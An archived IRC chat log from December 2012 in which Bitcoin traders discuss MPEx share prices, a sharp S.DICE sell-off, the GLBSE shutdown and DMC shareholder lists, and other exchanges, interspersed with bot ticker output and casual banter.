ddidnt specift Dec 22 00:26:08 y Dec 22 00:26:10 What happened? Dec 22 00:26:13 S.DICE? Dec 22 00:26:16 blakdawg bonks BTCHero Buglouse Bugpowder burnside Dec 22 00:26:16 blakdawg bonks BTCHero Buglouse Bugpowder burnside Dec 22 00:26:18 ? Dec 22 00:26:21 news, or just insane people again Dec 22 00:26:22 big sell Bugpowder Dec 22 00:26:30 no news that i've seen Dec 22 00:26:40 idiopathic sell Dec 22 00:26:47 smickles: otehr than today major hack? 0,o Dec 22 00:26:55 i'm not actually watching the chain. did they just lose like the house ? Dec 22 00:26:59 j/k J/K *hides* Dec 22 00:27:00 Ukto what hack ? Dec 22 00:27:01 I would expect that after the BitVPS Dec 22 00:27:02 o fuck you omg Dec 22 00:27:05 forum post Dec 22 00:27:07 LOL Dec 22 00:27:09 S.DICE is fine Dec 22 00:27:13 yeah i hacked it Dec 22 00:27:13 it seems strange because div's havent been paid, you'd think someone would want to hang on until then!? Dec 22 00:27:15 in the blockchain Dec 22 00:27:21 mircea_popescu: hey.. just tryin to keep it real :P Dec 22 00:27:21 o crap i said it here it was meant pm !!! Dec 22 00:27:39 Bugpowder i sent you a gribble tell but then you joined and didn't id with nickserv and then d/c'd. did you get it ? Dec 22 00:27:44 I just wish I had stink bid Dec 22 00:27:45 yes Dec 22 00:27:46 someone run the dooglus scrypt Dec 22 00:27:51 I saw the message Dec 22 00:27:52 mod6 very strange indeed. Dec 22 00:27:56 glanced at the post Dec 22 00:28:02 but have not had time to review. Dec 22 00:28:03 Bugpowder a ok. wanted to see if it works Dec 22 00:28:08 and comment Dec 22 00:28:35 maybe someone lost control of their gpg key Dec 22 00:28:54 i was thinking fat-finger? Dec 22 00:28:55 now russians have "ASIC"'s https://bitcointalk.org/index.php?topic=131864.0 Dec 22 00:29:08 The way to make money really is to just put insane bids out and be patient Dec 22 00:29:26 Bugpowder whoever had those 18s and 14s made bank imo Dec 22 00:29:46 .0014.... sheeeit. Dividend is 10% at that price Dec 22 00:30:07 yea Dec 22 00:30:30 oh lol, i siad 100, didn't I? Dec 22 00:31:11 LOL: 15 More of the World’s Most Dangerous People, Selected by You .. #5 Satoshi Nakamoto. (wired.com) Dec 22 00:31:20 Nice Dec 22 00:31:37 \o/ Dec 22 00:32:16 or .o/ Dec 22 00:32:22 well, so the question in my mind... why isn't s.mpoe tanking. Dec 22 00:32:34 EskimoBob: you know Dec 22 00:32:38 Because they don't own any S.MPOE Dec 22 00:32:43 I should be a dick, and never allow you to claim shares Dec 22 00:33:17 Diablo-D3: you can always go out and suck one? How about that? Dec 22 00:33:19 Things look fine here http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL Dec 22 00:33:35 EskimoBob: no f'n way satoshi? Dec 22 00:33:49 Diablo-D3: you really need to get the latest updated list and clear up this crap. Dec 22 00:34:02 smickles: http://www.wired.com/dangerroom/2012/12/more-dangerous/ Dec 22 00:34:08 EskimoBob: nefario sends the lists out _when he feels like it_ Dec 22 00:34:24 you're lucky assets holders even have partial lists Dec 22 00:34:24 PLUS Dec 22 00:34:26 PLUS Dec 22 00:34:27 smickles: this is a readers voted list Dec 22 00:34:36 WHY THE FUCK DID IT TAKE YOU SO FUCKING LONG TO GO THROUGH THE CLAIMS PROCESS Dec 22 00:34:40 i like the #1 selected Dec 22 00:34:44 YOU'D ALREADY BE ON THE LIST IF YOU DID IT WHEN YOU WERE SUPPOSED TO Dec 22 00:34:48 Off to a pinot noir tasting dinner. Dec 22 00:34:51 Diablo-D3 i have no idea why anyone would trust them Dec 22 00:34:58 mircea_popescu: trust who? Dec 22 00:35:00 the only logical explanation was that he needed this long to falsify them Dec 22 00:35:01 me? I did it in day 10 or so, so calm the fuck down Dec 22 00:35:04 I sent in my claims in the first hour Dec 22 00:35:05 nefario's alleged lists. Dec 22 00:35:10 got my coins twice :) Dec 22 00:35:18 mircea_popescu: it matches what people have independently verified Dec 22 00:35:42 mircea_popescu: and DMC's list is basically complete, its only missing like 3xx shares out of 11909 Dec 22 00:35:53 later dudes. Dec 22 00:35:58 the fact that it matches what "people" have claimed means jack shit really. Dec 22 00:36:06 OBVIOUSLY it would. that's why it takes 3 months to make them Dec 22 00:36:21 no, I meant claimed to me Dec 22 00:36:29 yes, claimed to you. Dec 22 00:36:33 they tell me what the list should say, and then I check the list Dec 22 00:36:39 no one has been wrong yet. Dec 22 00:36:43 don't be dense. they can be working together. Dec 22 00:36:48 mircea_popescu: well, all significant claims of SS, I've tied to long standing WoT idents Dec 22 00:36:58 all 50 some of my shareholders? Dec 22 00:37:00 smickles it wouldn't logically be small assets rtho Dec 22 00:37:03 via cryptography Dec 22 00:37:04 Diablo-D3 one or two. Dec 22 00:37:12 its been about a dozen Dec 22 00:37:21 Diablo-D3: I told you, I only hold few shares of your fucked up DMC :) It was a fkn disaster an looks like you still cant get your shit in order. Why are you angry at me? You are the manager. Dec 22 00:37:30 EskimoBob: _my_ shit? Dec 22 00:37:33 bwhahahaha oh man Dec 22 00:37:34 mircea_popescu: i dunno, hudreds of btc is small, but is still nice change in your pocket Dec 22 00:37:39 did I give nefario permission to close glbse? no Dec 22 00:37:59 smickles ya but the trouble of making the shit up is likely not justifyied. Dec 22 00:38:01 was he paid to do a job and failed to do it? yes. Dec 22 00:38:15 it Dec 22 00:38:23 it'd be like if NYSE just closed shop one day and burned the records Dec 22 00:38:32 lettuce not exaggerate. Dec 22 00:38:35 you couldnt blame the companies listed on NYSE Dec 22 00:38:36 nyse is in the billions. Dec 22 00:38:45 mircea_popescu: nyse is also RAN CORRECTLY Dec 22 00:38:57 run* Dec 22 00:39:00 yes, dear Diablo-D3, your shit. Did I make all those retarded decisions or was it you? Umm... lets think about it for a second, or do you need a minute? Dec 22 00:39:02 Ukto: oh, and btw, if you fuck up like nefario did, I _will_ kill you. Dec 22 00:39:17 yawn.. Dec 22 00:39:18 Ukto: just letting you know ahead of time. Dec 22 00:39:25 Diablo-D3: I already have a suprise shut down date/time in mind. dont worry Dec 22 00:39:33 lol Dec 22 00:39:46 but Dec 22 00:39:47 BUT Dec 22 00:39:54 Diablo-D3: you mean _kill_ right? Dec 22 00:39:56 sadly for me.. it wont be as effective Dec 22 00:39:59 you forgot the flare Dec 22 00:40:02 since I have the public list Dec 22 00:40:14 I cant extort ppl for money or such Dec 22 00:40:25 EskimoBob: and no, I didnt make any "decisions". nefario claimed he vetted assets, and then let the assets do things that, if they were real companies on a real stock exchange, would be highly illegal Dec 22 00:40:35 LOL Dec 22 00:40:47 highly Dec 22 00:41:03 not like 2 inches illegal Dec 22 00:41:09 DMC only invested in companies. Those companies chose to scam investors, DMC had nothing to do with that decision. Dec 22 00:41:10 we're talking 6 feet at least Dec 22 00:41:17 smickles: under, yes. Dec 22 00:41:46 more like 6ft under Dec 22 00:41:57 lol, inb4 same joke a third time Dec 22 00:42:06 so what are you telling me that you where just a mindless chicken, clicking buttons of "buy" and "sell" and swap? Dec 22 00:42:10 hehe Dec 22 00:42:12 interesting Dec 22 00:42:21 really fkn interesting. Dec 22 00:42:24 EskimoBob: was? Dec 22 00:42:26 :P Dec 22 00:42:30 you are like that retard usagi :) Dec 22 00:42:31 I envision the muppets chickens Dec 22 00:42:35 EskimoBob: that pretty much saved DMC, yes. Dec 22 00:42:56 EskimoBob: he's trying to lay an egg. :P Dec 22 00:42:59 6 feet illegal Dec 22 00:43:05 Diablo-D3: so you tell me that you are incompetent chicken and not a portfolio manager? Dec 22 00:43:30 dude... I expected you to be something more Dec 22 00:43:37 =) Dec 22 00:43:44 EskimoBob: in the end, DMC bought back half the shares with the money made and still has about 2k btc worth of assets. Dec 22 00:43:48 not just buttons picking chicken Dec 22 00:44:01 EskimoBob: only 2k btc went into DMC. Dec 22 00:44:04 fuck.. I am so disappointed in you :( Dec 22 00:44:18 well Dec 22 00:44:20 lets leave it at that Dec 22 00:44:26 no need to repeat :) Dec 22 00:44:31 2K btc? really, ant after you where done, we had what? 0.02? Dec 22 00:44:45 Ukto: I agree Dec 22 00:44:54 why go over the same old shit Dec 22 00:44:57 heh. no need to nit-..peck.. >,> Dec 22 00:45:04 unless... itäs just for lulz Dec 22 00:45:15 EskimoBob: yes, share price dropped. only about 100 shares were ever sold above 0.66 Dec 22 00:45:16 on a side note Dec 22 00:45:24 so, apparently tor has 'torchat' now? Dec 22 00:45:39 dude, you lost 98% of investors coin :) Dec 22 00:45:46 how do you figure? Dec 22 00:45:49 is there a torfilexfer now ? Dec 22 00:46:11 go program stuff, you are good at it Dec 22 00:46:26 are you? Dec 22 00:46:31 EskimoBob: okay so, 20k shares sold, 2k of btc went into dmc. Dec 22 00:46:31 -_- Dec 22 00:46:33 fine. afk Dec 22 00:46:35 [MPEX] [S.DICE] 1 @ 0.00359 BTC [+] Dec 22 00:46:37 now, Im pretty sure you can do the math Dec 22 00:47:18 OK, lets leave it at that. I have no wish to make fun of you unless you beg for it :) Dec 22 00:47:22 the average share sold price was already 0.10 Dec 22 00:47:44 I bought back half the shares, and we still had somewhere around that in assets Dec 22 00:48:02 so 10k shares, average sale price 0.10, 2k btc in assets. Dec 22 00:48:15 i'm still waiting for a torphone Dec 22 00:48:18 lets say I only had 1k btc in assets, I still lost 0%, nor gained 0%. Dec 22 00:48:26 mebbe I should do like btct Dec 22 00:48:27 EskimoBob: so your math is highly questionable Dec 22 00:48:34 and post shares of BF for sale Dec 22 00:48:48 no it is really simple. It was X and then it was X-99% Dec 22 00:49:04 yes, because I quit selling shares at full price Dec 22 00:49:10 no one wanted to buy 1btc shares. Dec 22 00:49:21 or if you like: it was 1 and then it was 1/98 Dec 22 00:49:34 I did so with permission of the first shareholders, so you cant run that angle either Dec 22 00:49:55 smickles: do me a favor and explain to EskimoBob how math works Dec 22 00:49:58 Im pretty sure he doesnt get it Dec 22 00:50:28 Diablo-D3: ya know, the foundations of math are still being debated Dec 22 00:50:39 smickles: now you're just trolling :< Dec 22 00:50:54 ROFLOL Dec 22 00:51:22 Diablo-D3: not at all, look up mathmatical platonism vs empiricism Dec 22 00:51:39 smickles: nothx Dec 22 00:51:42 there's even a contingent of monists out there Dec 22 00:52:28 and that's all confined to the scope of wether math actually exists or not Dec 22 00:52:41 there's so much more controversy in math Dec 22 00:57:44 Ukto what's bf revenue look like ? Dec 22 00:58:00 Is Ukto around Dec 22 01:03:22 [MPEX] [S.MPOE] 900 @ 0.00062 = 0.558 BTC [+] Dec 22 01:07:24 mircea_popescu: what.. daily? :P Dec 22 01:07:27 hasnt even been open a month Dec 22 01:07:41 and for all .. what.. 57 trades? :P Dec 22 01:08:06 well that answers your shares q :) Dec 22 01:08:24 oh, i was j/k Dec 22 01:08:35 was just tossing out a good waste of money idea :P Dec 22 01:09:22 [MPEX] [S.MPOE] 3300 @ 0.00062 = 2.046 BTC [+] Dec 22 01:10:12 ;;calc (507115 + 995840) * 0.0037 - (507115 * 0.0018 + 995840 * 0.0014) Dec 22 01:10:13 3253.9505 Dec 22 01:10:28 so basically... someone(s) just made 3kish on mpex today. Dec 22 01:10:30 i am jealous. Dec 22 01:11:44 maybe it was same person - infini-cash Dec 22 01:12:16 lol Dec 22 01:12:41 ooo i see what you mean, sold into his own bids, create panic, buy cheap ? Dec 22 01:12:58 devious. Dec 22 01:13:21 yeah, theres a couple of explanations of what i said. Dec 22 01:13:35 some of them dont even make sense. Dec 22 01:13:51 haha' Dec 22 01:14:55 ;;calc 3253.9505 * 0.002 Dec 22 01:14:56 6.507901 Dec 22 01:15:15 not bad pay for a day of irc, eh mircea_popescu ;) Dec 22 01:17:00 mircea_popescu: your fees are indeed only 0.2% and MPEx allows selling/buying from yourself... Dec 22 01:17:12 So market manipulation is perfectly feasible. Dec 22 01:18:34 all the while the shareholders of s.mpoe make btc from it Dec 22 01:19:33 what did s.mpoe start out at 0.00001? Dec 22 01:19:58 smickles 2433 first trade. Dec 22 01:20:13 Namjies well the problem with anon market, you can't impede self-dealing. Dec 22 01:20:37 aye Dec 22 01:20:46 course, apparently nobody is muchly falling for it. Dec 22 01:20:56 tbh, i'd rather have market participants not fall for it than market not allowing it. Dec 22 01:20:58 seems safer. Dec 22 01:21:17 not to mention on the macro level it impedes significantly momentum trading. Dec 22 01:22:07 I always thought that was stupid to protect people against faked trends. The price trend of a stock should not be what makes you invest in a stock. Unless you're daytrading. Dec 22 01:22:21 and if you are daytrading, well... risk is yours. Dec 22 01:22:37 The value of the business behind, it's current dividends and current related events should matter. Dec 22 01:22:42 [MPEX] [S.MPOE] 9885 @ 0.00062 = 6.1287 BTC [+] Dec 22 01:23:07 If price is currently going down to top it, while news are good, all the better. Dec 22 01:23:17 indeed. Dec 22 01:28:11 live.coinbr.com back online at last, bitvps seems to have fixed the issue. but must still refill recent data Dec 22 01:28:25 La prova di assunzione per quell'unico ambitissimo posto di aiuto del vice corruttore laterale mafioso, consisteva nel risolvere un problema di contabilità nera, basata su codici segreti di esponenti piduisti dell'intrallazzone politico-camorrista. Dec 22 01:28:33 ahahaha does anyone here know fantozzi ? Dec 22 01:29:27 [MPEX] [S.MPOE] 2000 @ 0.00062 = 1.24 BTC [+] Dec 22 01:29:46 ... Dec 22 01:29:50 did you say fatponzi ? Dec 22 01:30:23 fantozzi ragioner ugo Dec 22 01:30:29 matricola mille uno bara bis Dec 22 01:30:38 it's like piglatin Dec 22 01:30:53 (dell'ufficio sinistri) Dec 22 01:31:01 smickles it's pretty much italian monty python Dec 22 01:31:36 crap, now i've gotta learn italian Dec 22 01:31:38 the 70s/80s were very prolific in europe. france/spain had luis de funes (know him ?) Dec 22 01:31:45 italians had paolo villaggio Dec 22 01:31:55 if they ar enot american, then no Dec 22 01:31:56 :PO Dec 22 01:32:33 europe had better tv than the us since about 1950 Dec 22 01:32:40 y Dec 22 01:32:44 it still sucked, obviously, but at least wasn't quite as bad Dec 22 01:33:30 Anduck cause over here we don't mind naked women and laughing at jesus&surogates. Dec 22 01:33:36 i know the funes well, superfantozzi only a bit Dec 22 01:33:42 yeh Dec 22 01:33:53 and UK had benny hill Dec 22 01:33:58 y was meant to be "yes" Dec 22 01:34:11 maybe a bit too slapstick, mr hill. Dec 22 01:35:41 whatever. just that i remember him much more. we had only one tv and parents had no taste for monty python Dec 22 01:36:01 :p Dec 22 01:36:07 and later, getting stuff with proper subtitles is pita. so i never saw much of teh pythons Dec 22 01:36:30 [MPEX] [S.MPOE] 4000 @ 0.00062 = 2.48 BTC [+] Dec 22 01:37:08 are you being served... Dec 22 01:37:14 red dwarf Dec 22 01:37:19 :P Dec 22 01:37:22 oh Dec 22 01:37:23 mr bean Dec 22 01:37:32 rowen atkin in general Dec 22 01:42:14 im fluent so i don't used subtitles. it's a great boon. Dec 22 01:46:46 [MPEX] [S.MPOE] 7400 @ 0.00062 = 4.588 BTC [+] Dec 22 01:47:21 mircea_popescu Dec 22 01:47:58 mircea_popescu, you ears aren't fucked, that is a boon indeed Dec 22 01:49:24 live.coinbr.com is now fully restored. s.mpoe daily chart is incredibly dull but the cause is somewhere else Dec 22 01:50:25 [MPEX] [S.MPOE] 2100 @ 0.00062 = 1.302 BTC [+] Dec 22 01:53:36 and the s.dice one sorely needs fix Dec 22 01:54:26 Indeed someone is doing such trades on purpose to screw the charts. Dec 22 01:58:45 indeed someone is overusing that word Dec 22 01:59:30 indeed someone is talking with himself Dec 22 02:00:28 jurov indeed Dec 22 02:00:49 mircea_popescu: you should host a mirror of the blockchain Dec 22 02:02:18 indeed. so btctalk can freak out "mircea is going to manipulate our preciousssss blockchain" Dec 22 02:09:26 hey guys... we have a windows release of OT and Moneychanger :) Dec 22 02:09:44 maybe it is time that people can start to look into using OT for asset mgmt Dec 22 02:09:58 https://bitcointalk.org/index.php?topic=77301.0 Dec 22 02:10:18 mircea_popescu: ^^ you may be esp intersted in this :) Dec 22 02:10:25 [MPEX] [S.MPOE] 9100 @ 0.00062 = 5.642 BTC [+] Dec 22 02:14:27 why, causde of windows ? Dec 22 02:15:13 thestringpuller i was thinking about hosting one actually, mostly since i discovered clients are down under 20k Dec 22 02:15:53 mircea_popescu: becasue we already have good linux and mac support... and there is many users for windwos. Dec 22 02:16:04 aha Dec 22 02:18:31 [MPEX] [S.MPOE] 11400 @ 0.00062 = 7.068 BTC [+] Dec 22 02:19:16 well, this is enough excitement for one night. laters all! **** BEGIN LOGGING AT Sat Dec 22 11:35:15 2012 Dec 22 11:47:11 [MPEX] [S.MPOE] 32000 @ 0.00062 = 19.84 BTC [+] Dec 22 11:49:28 [MPEX] [S.MPOE] 8550 @ 0.00062 = 5.301 BTC [+] Dec 22 11:50:04 !ticker s.dice Dec 22 11:50:06 [MPEX:S.DICE] 1day: 0.0014 / 0.00161994 / 0.0036 (1762593 shares, 2,855.31 BTC), 30day: 0.0014 / 0.00308214 / 0.0037 (9018148 shares, 27,795.20 BTC) Dec 22 11:50:07 !ticker s.mpoe Dec 22 11:50:09 [MPEX:S.MPOE] 1day: 0.00062 / 0.00062 / 0.00062 (3772948 shares, 2,339.23 BTC), 30day: 0.00049308 / 0.00054332 / 0.00063995 (103148077 shares, 56,043.36 BTC) Dec 22 11:52:57 how much profit s.mpoe makes a mo? Dec 22 11:57:16 it varies Dec 22 11:57:22 made 4k, made 400 Dec 22 11:57:40 ok Dec 22 11:57:45 http://trilema.com/2012/mpoe-bonds-historical-data/ see the last paragraph there, it links to all monthly reports. Dec 22 12:02:15 [MPEX] [S.MPOE] 2700 @ 0.00062 = 1.674 BTC [+] Dec 22 12:03:21 alright Dec 22 12:03:24 now I am confused Dec 22 12:03:56 https://btct.co/security/BMF <--> https://bitcointalk.org/index.php?topic=130754.msg1414910#msg1414910 wtf? Dec 22 12:04:37 what's confusing ? Dec 22 12:05:17 oh, i see, its not open for voting on btct Dec 22 12:05:30 brun just cant hide it from view Dec 22 12:05:34 lol Dec 22 12:05:46 i had an eamil from btct telling me BMF was adding, and to go vote Dec 22 12:06:43 Well how unsurprising Dec 22 12:06:47 maybe he got no'd. Dec 22 12:06:58 no, votes are disabled on btct for it Dec 22 12:07:02 Namjies: what is? Dec 22 12:07:30 the relisting part, the liquidation part, or the fact that he wants the 5/10btc offer Dec 22 12:07:31 :P Dec 22 12:08:30 Annything Dec 22 12:08:41 lol Dec 22 12:08:54 wait, so btct doesn't really list by voting ? now i'm confused. Dec 22 12:09:04 apparently Dec 22 12:09:11 if you mentioned wanting to list on btct Dec 22 12:09:15 he creates an asset Dec 22 12:09:19 and puts it in public view Dec 22 12:09:23 so basically burnside is using the moderators to disclaim any liability in case anything goes wrong, Dec 22 12:09:25 even though its not 'live' Dec 22 12:09:29 but otherwise they don't really get to decide anything Dec 22 12:09:31 does list by voting only occur for new assets not imported ones? Dec 22 12:10:40 so burnside creates asset (its in public view), then btct sends an email to everyone that there is a new asset and to vote, then issuer begins editing profile, then the issuer unlocks the asset for voting Dec 22 12:10:53 Wait, I'm importing BTC-BOND and it appeared instantly, but for voting. Dec 22 12:11:09 It can't be traded or anything and I have to wait for votes. Dec 22 12:11:38 im guessing we have the new nefario. Dec 22 12:12:40 I'm pretty sure there's actual voting required... Dec 22 12:12:45 Namjies: kinda curious honestly, why pick btct over bitfunder? (I dont ask about crypto for obvious interface reasons) Dec 22 12:12:51 Namjies: there is Dec 22 12:12:58 it comes when the issuers unlock for voting Dec 22 12:14:05 Yes Dec 22 12:14:05 https://bitcointalk.org/index.php?topic=131922.msg1414728#msg1414728 phungus is doing a pretty good job of support. Dec 22 12:16:09 Good thing. Dec 22 12:16:16 pigeons your fav is getting hammered into dust (https://bitcointalk.org/index.php?topic=112447.msg1413923#msg1413923 and fol) Dec 22 12:16:46 Yes, I think arij and phungus will be really great for BitVPS. Dec 22 12:17:35 the business model is pretty good, the brand is well known, this may well work. just needs more hours than 1 person has it'd seem Dec 22 12:17:53 no, rg was able to do it alone. Dec 22 12:18:05 ya well rg is a nut. Dec 22 12:18:15 the vc theory says 3 man teams are best in any case. Dec 22 12:18:23 He just got another job and working 65+ hours a week + juggling with BitVPS although neglecting it. Dec 22 12:18:43 on top of his 65 hours of work... Dec 22 12:19:15 https://bitcointalk.org/index.php?action=dlattach;attach=10260;type=avatar lol nice logo Dec 22 12:36:57 [MPEX] [S.MPOE] 2007 @ 0.00062 = 1.2443 BTC [+] Dec 22 12:42:53 [MPEX] [S.MPOE] 4950 @ 0.00062 = 3.069 BTC [+] Dec 22 12:47:23 [MPEX] [S.MPOE] 1867 @ 0.00062 = 1.1575 BTC [+] Dec 22 12:51:33 [MPEX] [S.MPOE] 7540 @ 0.00062 = 4.6748 BTC [+] Dec 22 12:54:03 [MPEX] [S.MPOE] 7799 @ 0.00062 = 4.8354 BTC [+] Dec 22 12:54:20 i like that logo btw Dec 22 12:54:32 =P Dec 22 12:54:41 which ? Dec 22 12:55:08 mircea_popescu: the bvps logo Dec 22 12:56:08 a a Dec 22 12:56:10 not badf Dec 22 12:58:03 [MPEX] [S.MPOE] 14100 @ 0.00062 = 8.742 BTC [+] Dec 22 13:08:59 [MPEX] [S.MPOE] 4907 @ 0.00062 = 3.0423 BTC [+] Dec 22 13:22:34 [MPEX] [S.MPOE] 8100 @ 0.00062 = 5.022 BTC [+] Dec 22 13:30:33 [MPEX] [S.MPOE] 10968 @ 0.00062 = 6.8002 BTC [+] Dec 22 13:36:02 [MPEX] [S.MPOE] 3100 @ 0.00062 = 1.922 BTC [+] Dec 22 13:46:47 [MPEX] [S.MPOE] 11414 @ 0.00062 = 7.0767 BTC [+] Dec 22 13:48:33 well Dec 22 13:48:36 I blame mircea_popescu Dec 22 13:48:38 :P Dec 22 13:48:46 its ALL his fault Dec 22 13:50:43 [MPEX] [S.MPOE] 8400 @ 0.00062 = 5.208 BTC [+] Dec 22 13:54:38 [MPEX] [S.MPOE] 6583 @ 0.00062 = 4.0815 BTC [+] Dec 22 14:11:00 [MPEX] [S.MPOE] 12200 @ 0.00062 = 7.564 BTC [+] Dec 22 14:18:11 [MPEX] [S.MPOE] 6628 @ 0.00062 = 4.1094 BTC [+] Dec 22 14:18:57 [MPEX] [S.MPOE] 8900 @ 0.00062 = 5.518 BTC [+] Dec 22 14:19:07 what'd i do ? Dec 22 14:26:34 [MPEX] [S.MPOE] 6950 @ 0.00062 = 4.309 BTC [+] Dec 22 14:26:35 do? Dec 22 14:26:41 what HAVENT you done? Dec 22 14:26:41 :P Dec 22 14:30:23 Ukto http://trilema.com/2012/jus-sayin/ Dec 22 14:53:11 [MPEX] [S.MPOE] 6700 @ 0.00062 = 4.154 BTC [+] Dec 22 15:01:11 [MPEX] [S.MPOE] 10750 @ 0.00062 = 6.665 BTC [+] Dec 22 15:12:25 mornin Dec 22 15:13:33 ;;bc,stats Dec 22 15:13:36 Error: invalid syntax (, line 1) Dec 22 15:13:47 ;;bc,stats Dec 22 15:13:49 Error: invalid syntax (, line 1) Dec 22 15:17:16 [MPEX] [S.MPOE] 7601 @ 0.00062 = 4.7126 BTC [+] Dec 22 15:24:50 [MPEX] [S.MPOE] 2061 @ 0.00062 = 1.2778 BTC [+] Dec 22 15:27:16 ;;bc,stats Dec 22 15:27:29 TELLME Dec 22 15:27:42 Error: invalid syntax (, line 1) Dec 22 15:31:11 [MPEX] [S.MPOE] 4200 @ 0.00062 = 2.604 BTC [+] Dec 22 15:33:19 lolz Dec 22 15:33:19 https://bitcointalk.org/index.php?topic=131993.0 Dec 22 15:37:41 ;;bc,stat ? Dec 22 15:37:42 Error: "bc,stat" is not a valid command. Dec 22 15:38:15 kakobrekla whoa Dec 22 15:38:38 people suckin balls. Dec 22 15:41:00 so, what gonna happen with bitmarket.eu nao Dec 22 15:42:37 nothing likel;y Dec 22 15:42:49 eh? Dec 22 15:42:50 closedown? Dec 22 15:43:02 [MPEX] [S.MPOE] 10500 @ 0.00062 = 6.51 BTC [+] Dec 22 15:44:47 i cannot belive the balls the guy had to move clients funds to not only leveraged platform but also putting the funds in someone elses hands Dec 22 15:49:36 [MPEX] [S.MPOE] 8300 @ 0.00062 = 5.146 BTC [+] Dec 22 15:53:18 [MPEX] [S.DICE] 1200 @ 0.00358998 = 4.308 BTC [-] Dec 22 15:54:13 kakobrekla indeed. Dec 22 15:54:16 me either really. Dec 22 16:00:31 [MPEX] [S.MPOE] 11332 @ 0.00062 = 7.0258 BTC [+] Dec 22 16:02:26 the problem i envisage i drama doesn;t last like it used to Dec 22 16:02:36 bitcoin magazine implodes ? it's gone in a day Dec 22 16:02:54 the ver privacy fiasco ? they're trying hard to resuscitate it but it died overnight Dec 22 16:03:19 this bitcoinmarket idiot blows it in unimaginable stupid way ? next day it's all deflated. Dec 22 16:03:33 this looks like drama inflationary spiral of doom. Dec 22 16:04:03 You know, I can't drink whiskey like I used to could. Dec 22 16:04:05 I get the shits every time, don't you know? Dec 22 16:05:44 hehehe Dec 22 16:06:18 i hadn't been drinking much the past few years. recently i had dinner at a serb's restaurant with friends Dec 22 16:06:32 very nice guy, family atmosphere, it morphed into an all nighter Dec 22 16:06:39 [MPEX] [S.MPOE] 3169 @ 0.00062 = 1.9648 BTC [+] Dec 22 16:06:58 i ended up drinking 28 Slivovitz's and then walked out. Dec 22 16:07:05 lolz Dec 22 16:07:07 in short, i say it's like riding a bike Dec 22 16:07:09 you never forgrty. Dec 22 16:07:13 :D Dec 22 16:07:13 forget* Dec 22 16:13:00 lol m4v3rs avatar is so apropriate Dec 22 16:13:06 https://bitcointalk.org/index.php?action=dlattach;attach=1199;type=avatar Dec 22 16:18:53 has face needs palm Dec 22 16:19:10 "1) GLBSE still owes us money, but the total debt is much less than 5000BTC. " Dec 22 16:19:15 i thought glbse paid out ? Dec 22 16:19:43 dunno Dec 22 16:20:07 at this point anyone can claim anything Dec 22 16:20:26 this is the asicminer guy Dec 22 16:20:40 or girl Dec 22 16:20:44 is it a guy or a girl ? Dec 22 16:20:55 there are no girls on the internets Dec 22 16:21:29 other than my propertah. Dec 22 16:26:44 SIR mircea_popescu of Romania Dec 22 16:27:11 lol Dec 22 16:27:12 hallo Dec 22 16:27:46 less than 3 million shares to go Dec 22 16:28:10 ;;calc 6200 - 2909.387 Dec 22 16:28:10 3290.613 Dec 22 16:28:22 merry christmas mr. popescu ;) Dec 22 16:28:48 [MPEX] [S.MPOE] 7850 @ 0.00062 = 4.867 BTC [+] Dec 22 16:32:50 ;;ticker Dec 22 16:32:51 BTCUSD ticker | Best bid: 13.35200, Best ask: 13.37197, Bid-ask spread: 0.01997, Last trade: 13.37198, 24 hour volume: 19786.24376264, 24 hour low: 13.35010, 24 hour high: 13.58998, 24 hour vwap: 13.47721 Dec 22 16:33:02 !ticker S.DICE Dec 22 16:33:04 [MPEX:S.DICE] 1day: 0.0014 / 0.00162128 / 0.0036 (1763793 shares, 2,859.62 BTC), 30day: 0.0014 / 0.0030822 / 0.0037 (9019348 shares, 27,799.51 BTC) Dec 22 16:39:31 [MPEX] [S.MPOE] 2848 @ 0.00062 = 1.7658 BTC [+] Dec 22 16:46:36 http://i.imgur.com/24CJl.jpg so giga is making his own sort-of stock exchange Dec 22 16:46:49 if the asicminer ppl do too that will be 3+2 = 5 Dec 22 16:47:05 or wait, Diablo-D3 was making one too ? Dec 22 16:47:26 why dont i have one or two? Dec 22 16:49:18 ya, have two, hire pr for each, popcorn. Dec 22 16:49:29 [MPEX] [S.MPOE] 5300 @ 0.00062 = 3.286 BTC [+] Dec 22 16:49:32 ya have them catfight. Dec 22 16:49:43 dis is gonna be costly. Dec 22 16:49:48 get like a really tall blonde with nice legs and big tits for one Dec 22 16:49:59 and a really hot brunette with kardashian ass for the other Dec 22 16:50:06 and buy a mud puddle. Dec 22 16:50:08 :> Dec 22 16:50:27 then your gf can referee Dec 22 16:50:28 i thought we already were in one Dec 22 16:50:43 nah, this is crappy water mud. you want silicone gel mud. Dec 22 16:51:04 oh didnt know that exists Dec 22 16:51:07 haha sure. Dec 22 16:51:11 well thats why we have the pros around Dec 22 16:51:26 expensive as shit but looks much muddier on camera. Dec 22 16:51:36 heh Dec 22 16:52:59 what's the point of all these stock exchanges Dec 22 16:53:06 these niggas need to stop saturating the market Dec 22 16:53:14 thestringpuller people can code, people want to code. as a result we get piles of code. Dec 22 16:53:30 people hate reading code, as a result the piles are shitty, useless, unaudited code. Dec 22 16:53:35 i dont want to code Dec 22 16:53:37 code something useful like smickle's bot Dec 22 16:53:38 i code cause im lazy Dec 22 16:53:44 that will destroy the MPOE bot mwahaha Dec 22 16:53:55 thestringpuller tbh mpoe bot is a miracle of longevity. Dec 22 16:54:00 it's been trading since august ffs. Dec 22 16:54:07 i never heard of this before. Dec 22 16:54:26 update yo code Dec 22 16:54:34 instead of getting laid in mumbai Dec 22 16:55:31 "update". you don't fix what ain't broken. Dec 22 16:55:43 yea you do Dec 22 16:55:50 it's how you make companies like aapl ;) Dec 22 17:11:32 [MPEX] [S.MPOE] 13445 @ 0.00062 = 8.3359 BTC [+] Dec 22 17:13:01 [MPEX] [S.MPOE] 9200 @ 0.00062 = 5.704 BTC [+] Dec 22 17:35:52 [MPEX] [S.MPOE] 15166 @ 0.00062 = 9.4029 BTC [+] Dec 22 17:51:01 [MPEX] [S.MPOE] 8204 @ 0.00062 = 5.0865 BTC [+] Dec 22 17:58:40 [MPEX] [S.MPOE] 11200 @ 0.00062 = 6.944 BTC [+] Dec 22 18:02:25 https://bitcointalk.org/index.php?topic=131993.0 Dec 22 18:02:29 so -pr is popular nao ?! Dec 22 18:02:34 where is the world going to@ Dec 22 18:19:42 [MPEX] [S.MPOE] 10700 @ 0.00062 = 6.634 BTC [+] Dec 22 18:24:43 heh, soon she'll be sent crowd funded flowers or something Dec 22 18:25:30 [MPEX] [S.MPOE] 11700 @ 0.00062 = 7.254 BTC [+] Dec 22 18:25:32 [MPEX] [O.BTCUSD.P130T] 300 @ 0.04750236 = 